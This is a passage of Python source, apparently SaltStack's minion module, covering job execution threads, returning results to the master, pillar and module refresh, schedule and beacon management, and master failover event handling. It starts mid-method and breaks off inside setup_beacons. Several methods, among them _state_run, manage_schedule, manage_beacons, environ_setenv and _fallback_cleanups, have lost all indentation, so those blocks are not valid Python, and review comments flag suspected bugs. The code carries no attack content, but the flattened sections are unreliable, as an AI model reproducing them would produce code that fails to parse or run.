        salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
        sdata = {'pid': os.getpid()}
        sdata.update(data)
        log.info('Starting a new job with PID %s', sdata['pid'])
        with salt.utils.files.fopen(fn_, 'w+b') as fp_:
            fp_.write(minion_instance.serial.dumps(sdata))
        ret = {'success': False}
        function_name = data['fun']
        if function_name in minion_instance.functions:
            try:
                # Blackout mode: refuse everything except refresh_pillar and
                # the configured whitelist (checked in both pillar and grains).
                minion_blackout_violation = False
                if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
                    whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
                    # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
                    if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
                        minion_blackout_violation = True
                # use minion_blackout_whitelist from grains if it exists
                if minion_instance.opts['grains'].get('minion_blackout', False):
                    whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
                    if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
                        minion_blackout_violation = True
                if minion_blackout_violation:
                    raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
                                              'to False in pillar or grains to resume operations. Only '
                                              'saltutil.refresh_pillar allowed in blackout mode.')
                func = minion_instance.functions[function_name]
                args, kwargs = load_args_and_kwargs(
                    func,
                    data['arg'],
                    data)
                minion_instance.functions.pack['__context__']['retcode'] = 0
                # Resolve the executor chain: job data wins over opts; a bare
                # string is treated as a one-element chain.
                executors = data.get('module_executors') or opts.get('module_executors', ['direct_call'])
                if isinstance(executors, six.string_types):
                    executors = [executors]
                elif not isinstance(executors, list) or not executors:
                    raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
                                              format(executors))
                if opts.get('sudo_user', '') and executors[-1] != 'sudo':
                    executors[-1] = 'sudo'  # replace the last one with sudo
                log.trace('Executors list %s', executors)  # pylint: disable=no-member
                # Run executors in order; the first to return non-None wins.
                for name in executors:
                    fname = '{0}.execute'.format(name)
                    if fname not in minion_instance.executors:
                        raise SaltInvocationError("Executor '{0}' is not available".format(name))
                    return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
                    if return_data is not None:
                        break
                if isinstance(return_data, types.GeneratorType):
                    # Generator returns are streamed: each chunk is fired to
                    # the master as a progress event while accumulating the
                    # final return (dict merge when possible, list otherwise).
                    ind = 0
                    iret = {}
                    for single in return_data:
                        if isinstance(single, dict) and isinstance(iret, dict):
                            iret.update(single)
                        else:
                            if not iret:
                                iret = []
                            iret.append(single)
                        tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
                        event_data = {'return': single}
                        minion_instance._fire_master(event_data, tag)
                        ind += 1
                    ret['return'] = iret
                else:
                    ret['return'] = return_data
                ret['retcode'] = minion_instance.functions.pack['__context__'].get(
                    'retcode',
                    0
                )
                ret['success'] = True
            except CommandNotFoundError as exc:
                msg = 'Command required for \'{0}\' not found'.format(
                    function_name
                )
                log.debug(msg, exc_info=True)
                ret['return'] = '{0}: {1}'.format(msg, exc)
                ret['out'] = 'nested'
            except CommandExecutionError as exc:
                log.error(
                    'A command in \'%s\' had a problem: %s',
                    function_name, exc,
                    exc_info_on_loglevel=logging.DEBUG
                )
                ret['return'] = 'ERROR: {0}'.format(exc)
                ret['out'] = 'nested'
            except SaltInvocationError as exc:
                log.error(
                    'Problem executing \'%s\': %s',
                    function_name, exc,
                    exc_info_on_loglevel=logging.DEBUG
                )
                ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
                    function_name, exc
                )
                ret['out'] = 'nested'
            except TypeError as exc:
                msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__)
                log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
                ret['return'] = msg
                ret['out'] = 'nested'
            except Exception:
                msg = 'The minion function caused an exception'
                log.warning(msg, exc_info_on_loglevel=True)
                salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
                ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
                ret['out'] = 'nested'
        else:
            # Unknown function: return the docs of near-matches (when any)
            # plus the loader's explanation of why the module did not load.
            docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
            if docs:
                docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
                ret['return'] = docs
            else:
                ret['return'] = minion_instance.functions.missing_fun_string(function_name)
                mod_name = function_name.split('.')[0]
                if mod_name in minion_instance.function_errors:
                    ret['return'] += ' Possible reasons: \'{0}\''.format(
                        minion_instance.function_errors[mod_name]
                    )
            ret['success'] = False
            ret['retcode'] = 254
            ret['out'] = 'nested'
        ret['jid'] = data['jid']
        ret['fun'] = data['fun']
        ret['fun_args'] = data['arg']
        if 'master_id' in data:
            ret['master_id'] = data['master_id']
        if 'metadata' in data:
            if isinstance(data['metadata'], dict):
                ret['metadata'] = data['metadata']
            else:
                log.warning('The metadata parameter must be a dictionary. Ignoring.')
        if minion_instance.connected:
            minion_instance._return_pub(
                ret,
                timeout=minion_instance._return_retry_timer()
            )
        # Add default returners from minion config
        # Should have been coverted to comma-delimited string already
        if isinstance(opts.get('return'), six.string_types):
            if data['ret']:
                data['ret'] = ','.join((data['ret'], opts['return']))
            else:
                data['ret'] = opts['return']
        log.debug('minion return: %s', ret)
        # TODO: make a list? Seems odd to split it this late :/
        if data['ret'] and isinstance(data['ret'], six.string_types):
            if 'ret_config' in data:
                ret['ret_config'] = data['ret_config']
            if 'ret_kwargs' in data:
                ret['ret_kwargs'] = data['ret_kwargs']
            ret['id'] = opts['id']
            for returner in set(data['ret'].split(',')):
                try:
                    returner_str = '{0}.returner'.format(returner)
                    if returner_str in minion_instance.returners:
                        minion_instance.returners[returner_str](ret)
                    else:
                        returner_err = minion_instance.returners.missing_fun_string(returner_str)
                        log.error(
                            'Returner %s could not be loaded: %s',
                            returner_str, returner_err
                        )
                except Exception as exc:
                    log.exception(
                        'The return failed for job %s: %s', data['jid'], exc
                    )
    @classmethod
    def _thread_multi_return(cls, minion_instance, opts, data):
        '''
        This method should be used as a threading target, start the actual
        minion side execution.

        Multi-function variant of _thread_return(): ``data['fun']`` is a
        list/tuple of function names executed in order, with per-function
        return/retcode/success tracking.
        '''
        # Record the job in the proc dir so running jobs can be enumerated.
        fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
        if opts['multiprocessing'] and not salt.utils.platform.is_windows():
            # Shutdown the multiprocessing before daemonizing
            salt.log.setup.shutdown_multiprocessing_logging()
            salt.utils.process.daemonize_if(opts)
            # Reconfigure multiprocessing logging after daemonizing
            salt.log.setup.setup_multiprocessing_logging()
        salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
        sdata = {'pid': os.getpid()}
        sdata.update(data)
        log.info('Starting a new job with PID %s', sdata['pid'])
        with salt.utils.files.fopen(fn_, 'w+b') as fp_:
            fp_.write(minion_instance.serial.dumps(sdata))
        # Ordered mode keys results by position; otherwise by function name.
        multifunc_ordered = opts.get('multifunc_ordered', False)
        num_funcs = len(data['fun'])
        if multifunc_ordered:
            ret = {
                'return': [None] * num_funcs,
                'retcode': [None] * num_funcs,
                'success': [False] * num_funcs
            }
        else:
            ret = {
                'return': {},
                'retcode': {},
                'success': {}
            }
        for ind in range(0, num_funcs):
            if not multifunc_ordered:
                ret['success'][data['fun'][ind]] = False
            try:
                # Blackout mode: refuse everything except refresh_pillar and
                # the configured whitelist (checked in pillar, then grains).
                minion_blackout_violation = False
                if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
                    whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
                    # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
                    if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
                        minion_blackout_violation = True
                elif minion_instance.opts['grains'].get('minion_blackout', False):
                    whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
                    if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
                        minion_blackout_violation = True
                if minion_blackout_violation:
                    raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
                                              'to False in pillar or grains to resume operations. Only '
                                              'saltutil.refresh_pillar allowed in blackout mode.')
                func = minion_instance.functions[data['fun'][ind]]
                args, kwargs = load_args_and_kwargs(
                    func,
                    data['arg'][ind],
                    data)
                minion_instance.functions.pack['__context__']['retcode'] = 0
                if multifunc_ordered:
                    ret['return'][ind] = func(*args, **kwargs)
                    ret['retcode'][ind] = minion_instance.functions.pack['__context__'].get(
                        'retcode',
                        0
                    )
                    ret['success'][ind] = True
                else:
                    ret['return'][data['fun'][ind]] = func(*args, **kwargs)
                    ret['retcode'][data['fun'][ind]] = minion_instance.functions.pack['__context__'].get(
                        'retcode',
                        0
                    )
                    ret['success'][data['fun'][ind]] = True
            except Exception as exc:
                # One failing function must not abort the rest of the batch;
                # store the traceback as that function's return value.
                trb = traceback.format_exc()
                log.warning('The minion function caused an exception: %s', exc)
                if multifunc_ordered:
                    ret['return'][ind] = trb
                else:
                    ret['return'][data['fun'][ind]] = trb
            ret['jid'] = data['jid']
            ret['fun'] = data['fun']
            ret['fun_args'] = data['arg']
        if 'metadata' in data:
            ret['metadata'] = data['metadata']
        if minion_instance.connected:
            minion_instance._return_pub(
                ret,
                timeout=minion_instance._return_retry_timer()
            )
        if data['ret']:
            if 'ret_config' in data:
                ret['ret_config'] = data['ret_config']
            if 'ret_kwargs' in data:
                ret['ret_kwargs'] = data['ret_kwargs']
            for returner in set(data['ret'].split(',')):
                ret['id'] = opts['id']
                try:
                    minion_instance.returners['{0}.returner'.format(
                        returner
                    )](ret)
                except Exception as exc:
                    log.error(
                        'The return failed for job %s: %s',
                        data['jid'], exc
                    )
    def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
        '''
        Return the data from the executed command to the master server.

        :param dict ret: job return data; ``jid``/``fun`` (or the
            ``__jid__``/``__fun__`` aliases) identify the job
        :param str ret_cmd: master-side command to invoke (``_return`` or
            ``_syndic_return``)
        :param int timeout: seconds to wait for the master to accept the return
        :param bool sync: send synchronously when True, otherwise fire an
            async request on the IO loop
        :return: the master's response, or ``''`` when nothing was sent
        '''
        jid = ret.get('jid', ret.get('__jid__'))
        fun = ret.get('fun', ret.get('__fun__'))
        if self.opts['multiprocessing']:
            # Remove the proc file that marked this job as in-flight
            fn_ = os.path.join(self.proc_dir, jid)
            if os.path.isfile(fn_):
                try:
                    os.remove(fn_)
                except (OSError, IOError):
                    # The file is gone already
                    pass
        log.info('Returning information for job: %s', jid)
        log.trace('Return data: %s', ret)
        if ret_cmd == '_syndic_return':
            # Syndic returns carry the full job metadata; the aggregated
            # per-minion returns go under the 'return' key.
            # NOTE(review): syndic returns send opts['uid'] as 'id' while the
            # regular branch sends opts['id'] — confirm this is intended.
            load = {'cmd': ret_cmd,
                    'id': self.opts['uid'],
                    'jid': jid,
                    'fun': fun,
                    'arg': ret.get('arg'),
                    'tgt': ret.get('tgt'),
                    'tgt_type': ret.get('tgt_type'),
                    'load': ret.get('__load__')}
            if '__master_id__' in ret:
                load['master_id'] = ret['__master_id__']
            load['return'] = {}
            for key, value in six.iteritems(ret):
                # Keys starting with '__' are internal metadata, not returns
                if key.startswith('__'):
                    continue
                load['return'][key] = value
        else:
            load = {'cmd': ret_cmd,
                    'id': self.opts['id']}
            for key, value in six.iteritems(ret):
                load[key] = value
        # Attach the outputter: either the one given in the return data or
        # the one declared by the executed function via __outputter__.
        if 'out' in ret:
            if isinstance(ret['out'], six.string_types):
                load['out'] = ret['out']
            else:
                log.error(
                    'Invalid outputter %s. This is likely a bug.',
                    ret['out']
                )
        else:
            try:
                oput = self.functions[fun].__outputter__
            except (KeyError, AttributeError, TypeError):
                pass
            else:
                if isinstance(oput, six.string_types):
                    load['out'] = oput
        if self.opts['cache_jobs']:
            # Local job cache has been enabled
            if ret['jid'] == 'req':
                ret['jid'] = salt.utils.jid.gen_jid(self.opts)
            salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
        if not self.opts['pub_ret']:
            # Returning to the master is disabled by configuration
            return ''
        def timeout_handler(*_):
            # Best-effort: log and swallow the timeout so the caller
            # is not interrupted.
            log.warning(
                'The minion failed to return the job information for job %s. '
                'This is often due to the master being shut down or '
                'overloaded. If the master is running, consider increasing '
                'the worker_threads value.', jid
            )
            return True
        if sync:
            try:
                ret_val = self._send_req_sync(load, timeout=timeout)
            except SaltReqTimeoutError:
                timeout_handler()
                return ''
        else:
            with tornado.stack_context.ExceptionStackContext(timeout_handler):
                ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None)  # pylint: disable=unexpected-keyword-arg
        log.trace('ret_val = %s', ret_val)  # pylint: disable=no-member
        return ret_val
    def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
        '''
        Return the data from the executed command to the master server.

        Batch variant of :py:meth:`_return_pub`: accepts one return dict or a
        list of them, groups them by ``jid`` and sends all of them to the
        master in a single request.

        :param rets: a return dict or a list of return dicts
        :param str ret_cmd: master-side command (``_return`` or
            ``_syndic_return``)
        :param int timeout: seconds to wait for the master to accept the batch
        :param bool sync: send synchronously when True
        '''
        if not isinstance(rets, list):
            rets = [rets]
        # jid -> accumulated load for that job
        jids = {}
        for ret in rets:
            jid = ret.get('jid', ret.get('__jid__'))
            fun = ret.get('fun', ret.get('__fun__'))
            if self.opts['multiprocessing']:
                # Remove the proc file that marked this job as in-flight
                fn_ = os.path.join(self.proc_dir, jid)
                if os.path.isfile(fn_):
                    try:
                        os.remove(fn_)
                    except (OSError, IOError):
                        # The file is gone already
                        pass
            log.info('Returning information for job: %s', jid)
            load = jids.setdefault(jid, {})
            if ret_cmd == '_syndic_return':
                if not load:
                    # First return seen for this jid: record the job metadata
                    load.update({'id': self.opts['id'],
                                 'jid': jid,
                                 'fun': fun,
                                 'arg': ret.get('arg'),
                                 'tgt': ret.get('tgt'),
                                 'tgt_type': ret.get('tgt_type'),
                                 'load': ret.get('__load__'),
                                 'return': {}})
                if '__master_id__' in ret:
                    load['master_id'] = ret['__master_id__']
                for key, value in six.iteritems(ret):
                    # Keys starting with '__' are internal metadata
                    if key.startswith('__'):
                        continue
                    load['return'][key] = value
            else:
                load.update({'id': self.opts['id']})
                for key, value in six.iteritems(ret):
                    load[key] = value
                # Attach the outputter: from the return data if present,
                # otherwise from the executed function's __outputter__.
                if 'out' in ret:
                    if isinstance(ret['out'], six.string_types):
                        load['out'] = ret['out']
                    else:
                        log.error(
                            'Invalid outputter %s. This is likely a bug.',
                            ret['out']
                        )
                else:
                    try:
                        oput = self.functions[fun].__outputter__
                    except (KeyError, AttributeError, TypeError):
                        pass
                    else:
                        if isinstance(oput, six.string_types):
                            load['out'] = oput
                if self.opts['cache_jobs']:
                    # Local job cache has been enabled
                    salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
        load = {'cmd': ret_cmd,
                'load': list(six.itervalues(jids))}
        def timeout_handler(*_):
            # NOTE(review): 'jid' here is the loop variable left over from the
            # final iteration, so the warning names only the last jid of the
            # batch — confirm that is acceptable.
            log.warning(
                'The minion failed to return the job information for job %s. '
                'This is often due to the master being shut down or '
                'overloaded. If the master is running, consider increasing '
                'the worker_threads value.', jid
            )
            return True
        if sync:
            try:
                ret_val = self._send_req_sync(load, timeout=timeout)
            except SaltReqTimeoutError:
                timeout_handler()
                return ''
        else:
            with tornado.stack_context.ExceptionStackContext(timeout_handler):
                ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None)  # pylint: disable=unexpected-keyword-arg
        log.trace('ret_val = %s', ret_val)  # pylint: disable=no-member
        return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to False in Neon Salt release
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
    def beacons_refresh(self):
        '''
        Rebuild the beacons from the current opts and loaded functions.
        '''
        log.debug('Refreshing beacons.')
        self.beacons = salt.beacons.Beacon(self.opts, self.functions)
    # TODO: only allow one future in flight at a time?
    @tornado.gen.coroutine
    def pillar_refresh(self, force_refresh=False):
        '''
        Refresh the pillar.

        Re-compiles pillar data from the master(s) and then refreshes the
        loaded modules (module availability can depend on pillar data).
        A failed pillar compile is logged but does not abort the minion.

        :param bool force_refresh: passed through to module_refresh
        '''
        if self.connected:
            log.debug('Refreshing pillar')
            try:
                self.opts['pillar'] = yield salt.pillar.get_async_pillar(
                    self.opts,
                    self.opts['grains'],
                    self.opts['id'],
                    self.opts['saltenv'],
                    pillarenv=self.opts.get('pillarenv'),
                ).compile_pillar()
            except SaltClientError:
                # Do not exit if a pillar refresh fails.
                log.error('Pillar data could not be refreshed. '
                          'One or more masters may be down!')
        # Modules are refreshed even when disconnected or after a failure.
        self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist)
elif func == 'postpone_job':
self.schedule.postpone_job(name, data)
elif func == 'skip_job':
self.schedule.skip_job(name, data)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
elif func == 'get_next_fire_time':
self.schedule.get_next_fire_time(name)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons(include_opts, include_pillar)
elif func == 'list_available':
self.beacons.list_available_beacons()
elif func == 'validate_beacon':
self.beacons.validate_beacon(name, beacon_data)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
    def _pre_tune(self):
        '''
        Set the minion running flag and issue the appropriate warnings if
        the minion cannot be started or is already running.

        ``self._running`` is a tri-state flag: ``None`` means never started,
        ``True`` means already running, ``False`` means scheduled to stop.
        '''
        if self._running is None:
            self._running = True
        elif self._running is False:
            log.error(
                'This %s was scheduled to stop. Not running %s.tune_in()',
                self.__class__.__name__, self.__class__.__name__
            )
            return
        elif self._running is True:
            log.error(
                'This %s is already running. Not running %s.tune_in()',
                self.__class__.__name__, self.__class__.__name__
            )
            return
        try:
            log.info(
                '%s is starting as user \'%s\'',
                self.__class__.__name__, salt.utils.user.get_user()
            )
        except Exception as err:
            # Only windows is allowed to fail here. See #3189. Log as debug in
            # that case. Else, error.
            log.log(
                salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
                'Failed to get the user who is starting %s',
                self.__class__.__name__,
                exc_info=err
            )
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
    @tornado.gen.coroutine
    def handle_event(self, package):
        '''
        Handle an event from the epull_sock (all local minion events).

        Dispatches on the event tag prefix: module/pillar/beacons refresh,
        schedule and beacon management, grains refresh, environment changes,
        mine sends, master event forwarding, and master connection state
        changes (disconnected/failback/connected).

        :param package: raw event package to be unpacked into (tag, data)
        '''
        if not self.ready:
            # Core attributes are not set up yet; ignore events.
            raise tornado.gen.Return()
        tag, data = salt.utils.event.SaltEvent.unpack(package)
        log.debug(
            'Minion of \'%s\' is handling event tag \'%s\'',
            self.opts['master'], tag
        )
        if tag.startswith('module_refresh'):
            self.module_refresh(
                force_refresh=data.get('force_refresh', False),
                notify=data.get('notify', False)
            )
        elif tag.startswith('pillar_refresh'):
            yield self.pillar_refresh(
                force_refresh=data.get('force_refresh', False)
            )
        elif tag.startswith('beacons_refresh'):
            self.beacons_refresh()
        elif tag.startswith('manage_schedule'):
            self.manage_schedule(tag, data)
        elif tag.startswith('manage_beacons'):
            self.manage_beacons(tag, data)
        elif tag.startswith('grains_refresh'):
            # Only refresh when forced or when the grains actually changed.
            if (data.get('force_refresh', False) or
                    self.grains_cache != self.opts['grains']):
                # NOTE(review): pillar_refresh is a coroutine but its result
                # is not yielded here (unlike the pillar_refresh branch
                # above) — confirm this fire-and-forget call is intended.
                self.pillar_refresh(force_refresh=True)
                self.grains_cache = self.opts['grains']
        elif tag.startswith('environ_setenv'):
            self.environ_setenv(tag, data)
        elif tag.startswith('_minion_mine'):
            self._mine_send(tag, data)
        elif tag.startswith('fire_master'):
            if self.connected:
                log.debug('Forwarding master event tag=%s', data['tag'])
                self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
        elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
            # if the master disconnect event is for a different master, raise an exception
            if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
                # not mine master, ignore
                return
            if tag.startswith(master_event(type='failback')):
                # if the master failback event is not for the top master, raise an exception
                if data['master'] != self.opts['master_list'][0]:
                    # NOTE(review): the message says 'mine failback' — this
                    # looks like a typo for 'master failback'; confirm.
                    raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
                        data['master'], self.opts['master']))
                # if the master failback event is for the current master, raise an exception
                # NOTE(review): when opts['master'] is a string this compares
                # against its first character — was opts['master_list'][0]
                # intended? Confirm.
                elif data['master'] == self.opts['master'][0]:
                    raise SaltException('Already connected to \'{0}\''.format(data['master']))
            if self.connected:
                # we are not connected anymore
                self.connected = False
                log.info('Connection to master %s lost', self.opts['master'])
                if self.opts['master_type'] != 'failover':
                    # modify the scheduled job to fire on reconnect
                    if self.opts['transport'] != 'tcp':
                        schedule = {
                            'function': 'status.master',
                            'seconds': self.opts['master_alive_interval'],
                            'jid_include': True,
                            'maxrunning': 1,
                            'return_job': False,
                            'kwargs': {'master': self.opts['master'],
                                       'connected': False}
                        }
                        self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
                                                 schedule=schedule)
                else:
                    # delete the scheduled job to don't interfere with the failover process
                    if self.opts['transport'] != 'tcp':
                        self.schedule.delete_job(name=master_event(type='alive'))
                    log.info('Trying to tune in to next master from master-list')
                    # Tear down the old publish channel before failing over.
                    if hasattr(self, 'pub_channel'):
                        self.pub_channel.on_recv(None)
                        if hasattr(self.pub_channel, 'auth'):
                            self.pub_channel.auth.invalidate()
                        if hasattr(self.pub_channel, 'close'):
                            self.pub_channel.close()
                        del self.pub_channel
                    # if eval_master finds a new master for us, self.connected
                    # will be True again on successful master authentication
                    try:
                        master, self.pub_channel = yield self.eval_master(
                            opts=self.opts,
                            failed=True,
                            failback=tag.startswith(master_event(type='failback')))
                    except SaltClientError:
                        pass
                    if self.connected:
                        self.opts['master'] = master
                        # re-init the subsystems to work with the new master
                        log.info(
                            'Re-initialising subsystems for new master %s',
                            self.opts['master']
                        )
                        # put the current schedule into the new loaders
                        self.opts['schedule'] = self.schedule.option('schedule')
                        self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
                        # make the schedule to use the new 'functions' loader
                        self.schedule.functions = self.functions
                        self.pub_channel.on_recv(self._handle_payload)
                        self._fire_master_minion_start()
                        log.info('Minion is ready to receive requests!')
                        # update scheduled job to run with the new master addr
                        if self.opts['transport'] != 'tcp':
                            schedule = {
                                'function': 'status.master',
                                'seconds': self.opts['master_alive_interval'],
                                'jid_include': True,
                                'maxrunning': 1,
                                'return_job': False,
                                'kwargs': {'master': self.opts['master'],
                                           'connected': True}
                            }
                            self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
                                                     schedule=schedule)
                            if self.opts['master_failback'] and 'master_list' in self.opts:
                                if self.opts['master'] != self.opts['master_list'][0]:
                                    # Not on the top master: keep pinging it
                                    # so we can fail back when it returns.
                                    schedule = {
                                        'function': 'status.ping_master',
                                        'seconds': self.opts['master_failback_interval'],
                                        'jid_include': True,
                                        'maxrunning': 1,
                                        'return_job': False,
                                        'kwargs': {'master': self.opts['master_list'][0]}
                                    }
                                    self.schedule.modify_job(name=master_event(type='failback'),
                                                             schedule=schedule)
                                else:
                                    self.schedule.delete_job(name=master_event(type='failback'), persist=True)
                    else:
                        # No master could be reached: restart the minion.
                        self.restart = True
                        self.io_loop.stop()
        elif tag.startswith(master_event(type='connected')):
            # handle this event only once. otherwise it will pollute the log
            # also if master type is failover all the reconnection work is done
            # by `disconnected` event handler and this event must never happen,
            # anyway check it to be sure
            if not self.connected and self.opts['master_type'] != 'failover':
                log.info('Connection to master %s re-established', self.opts['master'])
                self.connected = True
                # modify the __master_alive job to only fire,
                # if the connection is lost again
                if self.opts['transport'] != 'tcp':
                    schedule = {
                        'function': 'status.master',
                        'seconds': self.opts['master_alive_interval'],
                        'jid_include': True,
                        'maxrunning': 1,
                        'return_job': False,
                        'kwargs': {'master': self.opts['master'],
                                   'connected': True}
                    }
                    self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
                                             schedule=schedule)
        elif tag.startswith('__schedule_return'):
            # reporting current connection with master
            if data['schedule'].startswith(master_event(type='alive', master='')):
                if data['return']:
                    log.debug(
                        'Connected to master %s',
                        data['schedule'].split(master_event(type='alive', master=''))[1]
                    )
            self._return_pub(data, ret_cmd='_return', sync=False)
        elif tag.startswith('_salt_error'):
            if self.connected:
                log.debug('Forwarding salt error event tag=%s', tag)
                self._fire_master(data, tag)
        elif tag.startswith('salt/auth/creds'):
            # Cache credentials shared by another process on this host.
            key = tuple(data['key'])
            log.debug(
                'Updating auth data for %s: %s -> %s',
                key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
            )
            salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
    def _setup_core(self):
        '''
        Set up the core minion attributes.
        This is safe to call multiple times.
        '''
        if not self.ready:
            # First call. Initialize.
            self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
            # Serializer for payloads exchanged with the master
            self.serial = salt.payload.Serial(self.opts)
            self.mod_opts = self._prep_mod_opts()
            # Matcher decides whether a publication targets this minion
            self.matcher = Matcher(self.opts, self.functions)
            self.beacons = salt.beacons.Beacon(self.opts, self.functions)
            uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
            # Directory where in-flight job proc files are tracked
            self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
            # Snapshot of grains, used by handle_event to detect changes
            self.grains_cache = self.opts['grains']
            # Guard flag so subsequent calls are no-ops
            self.ready = True
    def setup_beacons(self, before_connect=False):
        '''
        Set up the beacons.
        This is safe to call multiple times.

        :param bool before_connect: when True, process the beacons once
            immediately so they get a chance to run before the minion
            connects to the master
        '''
        self._setup_core()
        loop_interval = self.opts['loop_interval']
        # Callbacks created on this call; merged into self.periodic_callbacks
        # at the end so repeat calls do not duplicate them.
        new_periodic_callbacks = {}
